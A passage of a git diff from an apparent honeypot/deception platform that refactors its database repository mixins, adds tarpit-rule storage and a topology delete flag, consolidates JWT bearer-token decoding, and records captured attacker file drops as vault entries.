aggregates) can land here without churning callers. - statement = select( + statement = select( # type: ignore[call-overload, misc] AttackerIdentity.uuid, AttackerIdentity.campaign_id, AttackerIdentity.merged_into_uuid, diff --git a/decnet/web/db/sqlmodel_repo/canary.py b/decnet/web/db/sqlmodel_repo/canary.py index c42d4d4f..047008dc 100644 --- a/decnet/web/db/sqlmodel_repo/canary.py +++ b/decnet/web/db/sqlmodel_repo/canary.py @@ -10,7 +10,9 @@ from sqlalchemy import desc, func, select, update from decnet.web.db.models import CanaryBlob, CanaryToken, CanaryTrigger -class CanaryMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CanaryMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def upsert_canary_blob(self, data: dict[str, Any]) -> dict[str, Any]: @@ -110,7 +112,8 @@ class CanaryMixin: async with self._session() as session: result = await session.execute( select(CanaryToken).where( - CanaryToken.callback_token == callback_token + CanaryToken.callback_token == callback_token, + CanaryToken.state == "planted", ) ) row = result.scalar_one_or_none() @@ -122,6 +125,7 @@ class CanaryMixin: decky_name: Optional[str] = None, state: Optional[str] = None, kind: Optional[str] = None, + topology_id: Optional[str] = None, ) -> list[dict[str, Any]]: async with self._session() as session: stmt = select(CanaryToken) @@ -131,6 +135,8 @@ class CanaryMixin: stmt = stmt.where(CanaryToken.state == state) if kind is not None: stmt = stmt.where(CanaryToken.kind == kind) + if topology_id is not None: + stmt = stmt.where(CanaryToken.topology_id == topology_id) stmt = stmt.order_by(desc(CanaryToken.placed_at)) result = await session.execute(stmt) return [r.model_dump(mode="json") for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/credentials/_core.py b/decnet/web/db/sqlmodel_repo/credentials/_core.py index 86649e05..c2f0d61c 100644 --- a/decnet/web/db/sqlmodel_repo/credentials/_core.py +++ b/decnet/web/db/sqlmodel_repo/credentials/_core.py @@ -6,12 +6,15 @@ from datetime import datetime, timezone from typing import Any, List, Optional from sqlalchemy import desc, func, or_, select, update +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.web.db.models import Credential -class CredentialsCoreMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CredentialsCoreMixin(_MixinBase): async def upsert_credential(self, data: dict[str, Any]) -> int: """Upsert a credential attempt; returns the row id. @@ -37,7 +40,7 @@ class CredentialsCoreMixin: Credential.secret_sha256 == payload["secret_sha256"], # NULL == NULL is False under SQL — branch the predicate. (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) existing = (await session.execute(stmt)).scalar_one_or_none() now = datetime.now(timezone.utc) @@ -48,7 +51,7 @@ class CredentialsCoreMixin: existing.outcome = payload["outcome"] session.add(existing) await session.commit() - return existing.id # type: ignore[return-value] + return existing.id row = Credential( attacker_ip=payload["attacker_ip"], decky_name=payload["decky_name"], @@ -84,10 +87,10 @@ class CredentialsCoreMixin: lk = f"%{search}%" statement = statement.where( or_( - Credential.decky_name.like(lk), - Credential.service.like(lk), - Credential.principal.like(lk), - Credential.secret_printable.like(lk), + col(Credential.decky_name).like(lk), + col(Credential.service).like(lk), + col(Credential.principal).like(lk), + col(Credential.secret_printable).like(lk), ) ) return statement @@ -188,7 +191,7 @@ class CredentialsCoreMixin: update(Credential) .where( Credential.attacker_ip == attacker_ip, - Credential.attacker_uuid.is_(None), + col(Credential.attacker_uuid).is_(None), ) .values(attacker_uuid=attacker_uuid) ) diff --git a/decnet/web/db/sqlmodel_repo/credentials/reuse.py b/decnet/web/db/sqlmodel_repo/credentials/reuse.py index 8421a62f..74e6251e 100644 --- a/decnet/web/db/sqlmodel_repo/credentials/reuse.py +++ b/decnet/web/db/sqlmodel_repo/credentials/reuse.py @@ -9,11 +9,14 @@ from datetime import datetime, timezone from typing import Any, List, Optional from sqlalchemy import desc, func, select +from sqlmodel import col from decnet.web.db.models import Credential, CredentialReuse -class CredentialReuseMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CredentialReuseMixin(_MixinBase): @staticmethod def _merge_unique(existing_json: str, value: Optional[str]) -> tuple[str, bool]: """Append ``value`` to a JSON list[str] column if not present. @@ -117,7 +120,7 @@ class CredentialReuseMixin: Credential.secret_sha256 == secret_sha256, Credential.secret_kind == secret_kind, (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) ) target_count = (await session.execute(stmt)).scalar() or 0 @@ -150,7 +153,7 @@ class CredentialReuseMixin: ).label("target_count") async with self._session() as session: group_stmt = ( - select( + select( # type: ignore[call-overload] Credential.secret_sha256, Credential.secret_kind, Credential.principal, @@ -171,7 +174,7 @@ class CredentialReuseMixin: Credential.secret_kind == kind, (Credential.principal == principal) if principal is not None - else Credential.principal.is_(None), + else col(Credential.principal).is_(None), ) rows = (await session.execute(cred_stmt)).scalars().all() out.append({ @@ -253,13 +256,13 @@ class CredentialReuseMixin: sha_set = {r["secret_sha256"] for r in rows} if not sha_set: return - stmt = select( + stmt = select( # type: ignore[call-overload] Credential.secret_sha256, Credential.secret_kind, Credential.principal, Credential.secret_printable, Credential.secret_b64, - ).where(Credential.secret_sha256.in_(sha_set)) + ).where(col(Credential.secret_sha256).in_(sha_set)) secret_map: dict[ tuple[str, str, Optional[str]], tuple[Optional[str], Optional[str]], diff --git a/decnet/web/db/sqlmodel_repo/deckies.py b/decnet/web/db/sqlmodel_repo/deckies.py index 39b98f3f..7a66596f 100644 --- a/decnet/web/db/sqlmodel_repo/deckies.py +++ b/decnet/web/db/sqlmodel_repo/deckies.py @@ -11,7 +11,9 @@ from sqlalchemy import asc, select, text from decnet.web.db.models import DeckyShard -class DeckiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class DeckiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def upsert_decky_shard(self, data: dict[str, Any]) -> None: diff --git a/decnet/web/db/sqlmodel_repo/fleet.py b/decnet/web/db/sqlmodel_repo/fleet.py index 60eef39f..5ed25ca2 100644 --- a/decnet/web/db/sqlmodel_repo/fleet.py +++ b/decnet/web/db/sqlmodel_repo/fleet.py @@ -8,10 +8,13 @@ import orjson from sqlalchemy import asc, select, text, update from decnet.web.db.models import DeckyShard, FleetDecky, LOCAL_HOST_SENTINEL -from decnet.web.db.sqlmodel_repo._helpers import _deserialize_json_fields +from decnet.web.db.sqlmodel_repo._helpers import ( + _MixinBase, + _deserialize_json_fields +) -class FleetMixin: +class FleetMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. ``list_running_deckies`` aggregates topology + fleet + swarm-shard @@ -59,6 +62,16 @@ class FleetMixin: ) await session.commit() + async def get_fleet_decky_by_name(self, name: str) -> dict[str, Any] | None: + async with self._session() as session: + result = await session.execute( + select(FleetDecky).where(FleetDecky.name == name) + ) + row = result.scalar_one_or_none() + if row is None: + return None + return _deserialize_json_fields(row.model_dump(mode="json"), ("services", "decky_config")) + async def list_fleet_deckies( self, *, host_uuid: Optional[str] = None, ) -> list[dict[str, Any]]: diff --git a/decnet/web/db/sqlmodel_repo/identities.py b/decnet/web/db/sqlmodel_repo/identities.py index afb0b45d..a36bae11 100644 --- a/decnet/web/db/sqlmodel_repo/identities.py +++ b/decnet/web/db/sqlmodel_repo/identities.py @@ -11,11 +11,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, func, select, update +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerIdentity -class IdentitiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class IdentitiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. ``self._deserialize_attacker`` resolves through ``AttackersMixin`` @@ -51,7 +54,7 @@ class IdentitiesMixin: # and a future "merged into" endpoint when we need it. statement = ( select(AttackerIdentity) - .where(AttackerIdentity.merged_into_uuid.is_(None)) + .where(col(AttackerIdentity.merged_into_uuid).is_(None)) .order_by(desc(AttackerIdentity.updated_at)) .offset(offset) .limit(limit) @@ -64,7 +67,7 @@ class IdentitiesMixin: statement = ( select(func.count()) .select_from(AttackerIdentity) - .where(AttackerIdentity.merged_into_uuid.is_(None)) + .where(col(AttackerIdentity.merged_into_uuid).is_(None)) ) async with self._session() as session: result = await session.execute(statement) @@ -105,7 +108,7 @@ class IdentitiesMixin: # joined from logs, c2 endpoints aggregated from sessions) can # land here without churning every caller. ``fingerprints`` is # the raw JSON list — the clusterer parses for JA3 / HASSH. - statement = select( + statement = select( # type: ignore[call-overload] Attacker.uuid, Attacker.asn, Attacker.identity_id, Attacker.fingerprints, ).order_by(Attacker.first_seen) if limit is not None: diff --git a/decnet/web/db/sqlmodel_repo/logs.py b/decnet/web/db/sqlmodel_repo/logs.py index 4d1ae1a4..041d5694 100644 --- a/decnet/web/db/sqlmodel_repo/logs.py +++ b/decnet/web/db/sqlmodel_repo/logs.py @@ -15,13 +15,16 @@ from typing import Any, List, Optional import orjson from sqlalchemy import asc, desc, func, or_, select, text +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.config import load_state from decnet.web.db.models import Log, TopologyDecky -class LogsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class LogsMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" @staticmethod @@ -61,9 +64,9 @@ class LogsMixin: end_time: Optional[str], ) -> SelectOfScalar: if start_time: - statement = statement.where(Log.timestamp >= start_time) + statement = statement.where(col(Log.timestamp) >= start_time) if end_time: - statement = statement.where(Log.timestamp <= end_time) + statement = statement.where(col(Log.timestamp) <= end_time) if search: try: @@ -95,10 +98,10 @@ class LogsMixin: lk = f"%{token}%" statement = statement.where( or_( - Log.raw_line.like(lk), - Log.decky.like(lk), - Log.service.like(lk), - Log.attacker_ip.like(lk), + col(Log.raw_line).like(lk), + col(Log.decky).like(lk), + col(Log.service).like(lk), + col(Log.attacker_ip).like(lk), ) ) return statement @@ -148,7 +151,7 @@ class LogsMixin: end_time: Optional[str] = None, ) -> List[dict]: statement = ( - select(Log).where(Log.id > last_id).order_by(asc(Log.id)).limit(limit) + select(Log).where(col(Log.id) > last_id).order_by(asc(Log.id)).limit(limit) ) statement = self._apply_filters(statement, search, start_time, end_time) diff --git a/decnet/web/db/sqlmodel_repo/orchestrator.py b/decnet/web/db/sqlmodel_repo/orchestrator.py index b84191a3..6fceb507 100644 --- a/decnet/web/db/sqlmodel_repo/orchestrator.py +++ b/decnet/web/db/sqlmodel_repo/orchestrator.py @@ -7,11 +7,14 @@ from typing import Any, Optional from sqlalchemy import delete as sa_delete from sqlalchemy import desc, func, or_, select +from sqlmodel import col from decnet.web.db.models import OrchestratorEmail, OrchestratorEvent -class OrchestratorMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class OrchestratorMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def record_orchestrator_event(self, data: dict[str, Any]) -> str: @@ -62,11 +65,11 @@ class OrchestratorMixin: deleted = 0 async with self._session() as session: dst_rows = await session.execute( - select(OrchestratorEvent.dst_decky_uuid).distinct() + select(col(OrchestratorEvent.dst_decky_uuid)).distinct() ) for (dst,) in dst_rows.all(): keep = await session.execute( - select(OrchestratorEvent.uuid) + select(col(OrchestratorEvent.uuid)) .where(OrchestratorEvent.dst_decky_uuid == dst) .order_by(desc(OrchestratorEvent.ts)) .limit(per_dst_cap) @@ -76,7 +79,7 @@ class OrchestratorMixin: continue stmt = sa_delete(OrchestratorEvent).where( OrchestratorEvent.dst_decky_uuid == dst, - OrchestratorEvent.uuid.notin_(keep_uuids), + col(OrchestratorEvent.uuid).notin_(keep_uuids), ) res = await session.execute(stmt) deleted += res.rowcount or 0 @@ -156,7 +159,7 @@ class OrchestratorMixin: (OrchestratorEmail.sender_email == recipient_email) & (OrchestratorEmail.recipient_email == sender_email), ), - OrchestratorEmail.success.is_(True), + col(OrchestratorEmail.success).is_(True), ) .order_by(desc(OrchestratorEmail.ts)) .limit(limit) @@ -169,11 +172,11 @@ class OrchestratorMixin: deleted = 0 async with self._session() as session: decky_rows = await session.execute( - select(OrchestratorEmail.mail_decky_uuid).distinct() + select(col(OrchestratorEmail.mail_decky_uuid)).distinct() ) for (mail_uuid,) in decky_rows.all(): keep = await session.execute( - select(OrchestratorEmail.uuid) + select(col(OrchestratorEmail.uuid)) .where(OrchestratorEmail.mail_decky_uuid == mail_uuid) .order_by(desc(OrchestratorEmail.ts)) .limit(per_decky_cap) @@ -183,7 +186,7 @@ class OrchestratorMixin: continue stmt = sa_delete(OrchestratorEmail).where( OrchestratorEmail.mail_decky_uuid == mail_uuid, - OrchestratorEmail.uuid.notin_(keep_uuids), + col(OrchestratorEmail.uuid).notin_(keep_uuids), ) res = await session.execute(stmt) deleted += res.rowcount or 0 diff --git a/decnet/web/db/sqlmodel_repo/realism.py b/decnet/web/db/sqlmodel_repo/realism.py index ee3f0002..eaa7dca8 100644 --- a/decnet/web/db/sqlmodel_repo/realism.py +++ b/decnet/web/db/sqlmodel_repo/realism.py @@ -10,7 +10,9 @@ from decnet.web.db.models import RealismConfig, SyntheticFile from decnet.web.db.models.realism import SYNTHETIC_FILE_BODY_LIMIT -class RealismMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class RealismMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def record_synthetic_file(self, data: dict[str, Any]) -> str: diff --git a/decnet/web/db/sqlmodel_repo/swarm.py b/decnet/web/db/sqlmodel_repo/swarm.py index 9fea2d9d..3e0de44c 100644 --- a/decnet/web/db/sqlmodel_repo/swarm.py +++ b/decnet/web/db/sqlmodel_repo/swarm.py @@ -8,7 +8,9 @@ from sqlalchemy import asc, select, text, update from decnet.web.db.models import SwarmHost -class SwarmMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SwarmMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. Expects ``self._session()``.""" async def add_swarm_host(self, data: dict[str, Any]) -> None: diff --git a/decnet/web/db/sqlmodel_repo/tarpit.py b/decnet/web/db/sqlmodel_repo/tarpit.py new file mode 100644 index 00000000..e2eb5df5 --- /dev/null +++ b/decnet/web/db/sqlmodel_repo/tarpit.py @@ -0,0 +1,72 @@ +"""Tarpit rule CRUD.""" +from __future__ import annotations + +import json +import uuid +from datetime import datetime, timezone +from typing import Any, Optional + +from sqlalchemy import select + +from decnet.web.db.models import TarpitRule + + +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TarpitMixin(_MixinBase): + """Mixin: composed onto ``SQLModelRepository``.""" + + async def set_tarpit_rule(self, data: dict[str, Any]) -> None: + """Upsert a tarpit rule keyed on ``decky_name`` (one rule per decky).""" + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == data["decky_name"]) + ) + existing = result.scalar_one_or_none() + if existing: + for k, v in data.items(): + setattr(existing, k, v) + session.add(existing) + else: + payload = { + "id": str(uuid.uuid4()), + "created_at": datetime.now(timezone.utc), + **data, + } + session.add(TarpitRule(**payload)) + await session.commit() + + async def get_tarpit_rule(self, decky_name: str) -> Optional[dict[str, Any]]: + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == decky_name) + ) + row = result.scalar_one_or_none() + if row is None: + return None + d = row.model_dump(mode="json") + d["ports"] = json.loads(d["ports"]) + return d + + async def delete_tarpit_rule(self, decky_name: str) -> bool: + async with self._session() as session: + result = await session.execute( + select(TarpitRule).where(TarpitRule.decky_name == decky_name) + ) + row = result.scalar_one_or_none() + if row is None: + return False + await session.delete(row) + await session.commit() + return True + + async def list_tarpit_rules(self) -> list[dict[str, Any]]: + async with self._session() as session: + result = await session.execute(select(TarpitRule)) + rows = result.scalars().all() + out = [] + for row in rows: + d = row.model_dump(mode="json") + d["ports"] = json.loads(d["ports"]) + out.append(d) + return out diff --git a/decnet/web/db/sqlmodel_repo/topology/_core.py b/decnet/web/db/sqlmodel_repo/topology/_core.py index a70f4c7c..8fbf9681 100644 --- a/decnet/web/db/sqlmodel_repo/topology/_core.py +++ b/decnet/web/db/sqlmodel_repo/topology/_core.py @@ -8,13 +8,16 @@ from typing import Any, Optional from sqlalchemy import desc, func, select, text from decnet.web.db.models import Topology, TopologyStatusEvent +from decnet.web.db.models.topology import TopologySummary +from sqlmodel import col + from decnet.web.db.sqlmodel_repo._helpers import ( - _deserialize_json_fields, - _serialize_json_fields, + _MixinBase, + _serialize_json_fields ) -class TopologyCoreMixin: +class TopologyCoreMixin(_MixinBase): """Topologies CRUD + ``_assert_pending`` / ``_check_and_bump_version``. The two private helpers live here because every other topology @@ -32,7 +35,7 @@ class TopologyCoreMixin: await session.refresh(row) return row.id - async def get_topology(self, topology_id: str) -> Optional[dict[str, Any]]: + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: async with self._session() as session: result = await session.execute( select(Topology).where(Topology.id == topology_id) @@ -40,15 +43,14 @@ class TopologyCoreMixin: row = result.scalar_one_or_none() if not row: return None - d = row.model_dump(mode="json") - return _deserialize_json_fields(d, ("config_snapshot",)) + return TopologySummary.model_validate(row.model_dump(mode="json")) async def list_topologies( self, status: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, - ) -> list[dict[str, Any]]: + ) -> list[TopologySummary]: statement = select(Topology).order_by(desc(Topology.created_at)) if status: statement = statement.where(Topology.status == status) @@ -59,9 +61,7 @@ class TopologyCoreMixin: async with self._session() as session: result = await session.execute(statement) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("config_snapshot",) - ) + TopologySummary.model_validate(r.model_dump(mode="json")) for r in result.scalars().all() ] @@ -140,15 +140,13 @@ class TopologyCoreMixin: await session.commit() return True - async def list_topologies_needing_resync(self) -> list[dict[str, Any]]: + async def list_topologies_needing_resync(self) -> list[TopologySummary]: async with self._session() as session: result = await session.execute( select(Topology).where(Topology.needs_resync == True) # noqa: E712 ) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("config_snapshot",) - ) + TopologySummary.model_validate(r.model_dump(mode="json")) for r in result.scalars().all() ] @@ -191,8 +189,8 @@ class TopologyCoreMixin: """Return ids of topologies currently in ``active|degraded``.""" async with self._session() as session: result = await session.execute( - select(Topology.id).where( - Topology.status.in_(["active", "degraded"]) + select(col(Topology.id)).where( + col(Topology.status).in_(["active", "degraded"]) ) ) return [r for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/topology/deckies.py b/decnet/web/db/sqlmodel_repo/topology/deckies.py index 23fac911..75b5f29a 100644 --- a/decnet/web/db/sqlmodel_repo/topology/deckies.py +++ b/decnet/web/db/sqlmodel_repo/topology/deckies.py @@ -8,13 +8,15 @@ from typing import Any, Optional from sqlalchemy import asc, select, text, update from decnet.web.db.models import TopologyDecky +from decnet.web.db.models.topology import DeckyRow from decnet.web.db.sqlmodel_repo._helpers import ( + _MixinBase, _deserialize_json_fields, _serialize_json_fields, ) -class TopologyDeckiesMixin: +class TopologyDeckiesMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -72,8 +74,19 @@ class TopologyDeckiesMixin: decky_uuid: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: - """Cascade-delete a decky + all its edges from a pending topology.""" + """Cascade-delete a decky + all its edges from a topology. + + Defaults to ``enforce_pending=True`` so HTTP CRUD callers + (api_decky_crud.py) get the existing 409 guard for free. The + mutator's ``apply_remove_decky`` is the only path that's + legitimately allowed to delete from an active topology — it + passes ``enforce_pending=False`` after dequeuing the mutation + through its own active-topology gating (the queue is the live + editing surface; the repo's CRUD guard is for the design-time + endpoints that mustn't bypass it). + """ async with self._session() as session: result = await session.execute( select(TopologyDecky).where(TopologyDecky.uuid == decky_uuid) @@ -81,7 +94,8 @@ class TopologyDeckiesMixin: d = result.scalar_one_or_none() if d is None: return - await self._assert_pending(session, d.topology_id) + if enforce_pending: + await self._assert_pending(session, d.topology_id) if expected_version is not None: await self._check_and_bump_version( session, d.topology_id, expected_version @@ -98,7 +112,7 @@ class TopologyDeckiesMixin: async def list_topology_deckies( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[DeckyRow]: async with self._session() as session: result = await session.execute( select(TopologyDecky) @@ -106,8 +120,10 @@ class TopologyDeckiesMixin: .order_by(asc(TopologyDecky.name)) ) return [ - _deserialize_json_fields( - r.model_dump(mode="json"), ("services", "decky_config") + DeckyRow.model_validate( + _deserialize_json_fields( + r.model_dump(mode="json"), ("services", "decky_config") + ) ) for r in result.scalars().all() ] diff --git a/decnet/web/db/sqlmodel_repo/topology/edges.py b/decnet/web/db/sqlmodel_repo/topology/edges.py index 6ce0330b..e82dcde1 100644 --- a/decnet/web/db/sqlmodel_repo/topology/edges.py +++ b/decnet/web/db/sqlmodel_repo/topology/edges.py @@ -6,9 +6,12 @@ from typing import Any, Optional from sqlalchemy import desc, select, text from decnet.web.db.models import TopologyEdge, TopologyStatusEvent +from decnet.web.db.models.topology import EdgeRow -class TopologyEdgesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TopologyEdgesMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -33,7 +36,12 @@ class TopologyEdgesMixin: edge_id: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: + """Delete one edge. ``enforce_pending=True`` by default — the + mutator's ``apply_detach_decky`` opts out, same rationale as + ``delete_topology_decky``. + """ async with self._session() as session: result = await session.execute( select(TopologyEdge).where(TopologyEdge.id == edge_id) @@ -41,7 +49,8 @@ class TopologyEdgesMixin: edge = result.scalar_one_or_none() if edge is None: return - await self._assert_pending(session, edge.topology_id) + if enforce_pending: + await self._assert_pending(session, edge.topology_id) if expected_version is not None: await self._check_and_bump_version( session, edge.topology_id, expected_version @@ -54,12 +63,12 @@ class TopologyEdgesMixin: async def list_topology_edges( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[EdgeRow]: async with self._session() as session: result = await session.execute( select(TopologyEdge).where(TopologyEdge.topology_id == topology_id) ) - return [r.model_dump(mode="json") for r in result.scalars().all()] + return [EdgeRow.model_validate(r.model_dump(mode="json")) for r in result.scalars().all()] async def list_topology_status_events( self, topology_id: str, limit: int = 100 diff --git a/decnet/web/db/sqlmodel_repo/topology/lans.py b/decnet/web/db/sqlmodel_repo/topology/lans.py index fe38c1f8..cfdfc369 100644 --- a/decnet/web/db/sqlmodel_repo/topology/lans.py +++ b/decnet/web/db/sqlmodel_repo/topology/lans.py @@ -6,9 +6,12 @@ from typing import Any, Optional from sqlalchemy import asc, select, text, update from decnet.web.db.models import LAN, TopologyEdge +from decnet.web.db.models.topology import LANRow -class LansMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class LansMixin(_MixinBase): """``self._assert_pending`` / ``self._check_and_bump_version`` resolve through ``TopologyCoreMixin`` via MRO.""" @@ -61,12 +64,18 @@ class LansMixin: lan_id: str, *, expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: - """Cascade-delete a LAN from a pending topology. + """Cascade-delete a LAN. Rejects if any decky declares this LAN as its home (i.e. has a non-bridge edge to it — the only LAN that decky lives in). The caller must delete or reassign the home-deckies first. + + ``enforce_pending=True`` by default keeps the HTTP CRUD guard + intact; the mutator's ``apply_remove_lan`` opts out (it has + already gated on topology status and the live-LAN docker + materialisation runs after). """ from decnet.topology.status import TopologyNotEditable # noqa: F401 @@ -75,7 +84,8 @@ class LansMixin: lan = result.scalar_one_or_none() if lan is None: return - await self._assert_pending(session, lan.topology_id) + if enforce_pending: + await self._assert_pending(session, lan.topology_id) # Home-decky check: any decky whose only edge lands here? edges_result = await session.execute( @@ -110,9 +120,9 @@ class LansMixin: async def list_lans_for_topology( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[LANRow]: async with self._session() as session: result = await session.execute( select(LAN).where(LAN.topology_id == topology_id).order_by(asc(LAN.name)) ) - return [r.model_dump(mode="json") for r in result.scalars().all()] + return [LANRow.model_validate(r.model_dump(mode="json")) for r in result.scalars().all()] diff --git a/decnet/web/db/sqlmodel_repo/topology/mutations.py b/decnet/web/db/sqlmodel_repo/topology/mutations.py index 0da55575..136ffbb1 100644 --- a/decnet/web/db/sqlmodel_repo/topology/mutations.py +++ b/decnet/web/db/sqlmodel_repo/topology/mutations.py @@ -10,7 +10,9 @@ from sqlalchemy import asc, desc, select, text from decnet.web.db.models import TopologyMutation -class TopologyMutationsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class TopologyMutationsMixin(_MixinBase): """``self._check_and_bump_version`` resolves through ``TopologyCoreMixin`` via MRO.""" diff --git a/decnet/web/db/sqlmodel_repo/webhooks.py b/decnet/web/db/sqlmodel_repo/webhooks.py index d6650c6d..ca37cb11 100644 --- a/decnet/web/db/sqlmodel_repo/webhooks.py +++ b/decnet/web/db/sqlmodel_repo/webhooks.py @@ -5,11 +5,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import select, update +from sqlmodel import col from decnet.web.db.models import WebhookSubscription -class WebhooksMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class WebhooksMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def create_webhook_subscription(self, data: dict[str, Any]) -> None: @@ -43,7 +46,7 @@ class WebhooksMixin: async with self._session() as session: stmt = select(WebhookSubscription) if enabled_only: - stmt = stmt.where(WebhookSubscription.enabled.is_(True)) + stmt = stmt.where(col(WebhookSubscription.enabled).is_(True)) stmt = stmt.order_by(WebhookSubscription.created_at) result = await session.execute(stmt) return [r.model_dump() for r in result.scalars().all()] @@ -100,7 +103,7 @@ class WebhooksMixin: # the counter informs the circuit-breaker heuristic, not a # correctness invariant. result = await session.execute( - select(WebhookSubscription.consecutive_failures).where( + select(col(WebhookSubscription.consecutive_failures)).where( WebhookSubscription.uuid == uuid ) ) diff --git a/decnet/web/dependencies.py b/decnet/web/dependencies.py index d3f83d29..abb25167 100644 --- a/decnet/web/dependencies.py +++ b/decnet/web/dependencies.py @@ -107,60 +107,48 @@ async def _get_user_cached(user_uuid: str) -> Optional[dict[str, Any]]: return user +_CREDENTIALS_EXCEPTION = HTTPException( + status_code=status.HTTP_401_UNAUTHORIZED, + detail="Could not validate credentials", + headers={"WWW-Authenticate": "Bearer"}, +) + + +def _jwt_to_uuid(token: str) -> str: + """Decode a raw JWT string and return the user UUID, or raise 401.""" + try: + payload: dict[str, Any] = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) + user_uuid: Optional[str] = payload.get("uuid") + if user_uuid is None: + raise _CREDENTIALS_EXCEPTION + return user_uuid + except jwt.PyJWTError: + raise _CREDENTIALS_EXCEPTION + + +def _bearer_from_header(request: Request) -> Optional[str]: + auth = request.headers.get("Authorization") + if auth and auth.startswith("Bearer "): + return auth.split(" ", 1)[1] + return None + + async def get_stream_user(request: Request, token: Optional[str] = None) -> str: """Auth dependency for SSE endpoints — accepts Bearer header OR ?token= query param. EventSource does not support custom headers, so the query-string fallback is intentional here only. """ - _credentials_exception = HTTPException( - status_code=status.HTTP_401_UNAUTHORIZED, - detail="Could not validate credentials", - headers={"WWW-Authenticate": "Bearer"}, - ) - - auth_header = request.headers.get("Authorization") - resolved: str | None = ( - auth_header.split(" ", 1)[1] - if auth_header and auth_header.startswith("Bearer ") - else token - ) + resolved = _bearer_from_header(request) or token if not resolved: - raise _credentials_exception - - try: - _payload: dict[str, Any] = jwt.decode(resolved, SECRET_KEY, algorithms=[ALGORITHM]) - _user_uuid: Optional[str] = _payload.get("uuid") - if _user_uuid is None: - raise _credentials_exception - return _user_uuid - except jwt.PyJWTError: - raise _credentials_exception + raise _CREDENTIALS_EXCEPTION + return _jwt_to_uuid(resolved) async def _decode_token(request: Request) -> str: """Decode and validate a Bearer JWT, returning the user UUID.""" - _credentials_exception = HTTPException( - status_code=status.HTTP_401_UNAUTHORIZED, - detail="Could not validate credentials", - headers={"WWW-Authenticate": "Bearer"}, - ) - - auth_header = request.headers.get("Authorization") - token: str | None = ( - auth_header.split(" ", 1)[1] - if auth_header and auth_header.startswith("Bearer ") - else None - ) + token = _bearer_from_header(request) if not token: - raise _credentials_exception - - try: - _payload: dict[str, Any] = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) - _user_uuid: Optional[str] = _payload.get("uuid") - if _user_uuid is None: - raise _credentials_exception - return _user_uuid - except jwt.PyJWTError: - raise _credentials_exception + raise _CREDENTIALS_EXCEPTION + return _jwt_to_uuid(token) async def get_current_user(request: Request) -> str: diff --git a/decnet/web/ingester.py b/decnet/web/ingester.py index 0ddbdfa5..bbf62482 100644 --- a/decnet/web/ingester.py +++ b/decnet/web/ingester.py @@ -568,6 +568,78 @@ async def _extract_bounty( }, }) + # 12. Captured file drops + stored mail. The `file_captured` event + # comes from inotifywait quarantines on SSH deckies; `message_stored` + # comes from the SMTP template's DATA-commit handler. Both are + # already what AttackerDetail's artifacts/mail tabs read; mirroring + # them into the Bounty table makes the global Vault page show them + # alongside credentials and fingerprints. Dedup on (bounty_type, + # attacker_ip, payload); sha256 in the payload guarantees per-drop + # uniqueness so repeat captures don't multiply rows. + _evt = log_data.get("event_type") + if _evt == "file_captured" and _fields.get("stored_as"): + await repo.add_bounty({ + "decky": log_data.get("decky"), + "service": log_data.get("service"), + "attacker_ip": log_data.get("attacker_ip"), + "bounty_type": "artifact", + "payload": { + "kind": "file", + "stored_as": _fields.get("stored_as"), + "sha256": _fields.get("sha256"), + "size": _fields.get("size"), + "orig_path": _fields.get("orig_path"), + "attribution": _fields.get("attribution"), + "writer_comm": _fields.get("writer_comm"), + }, + }) + elif _evt 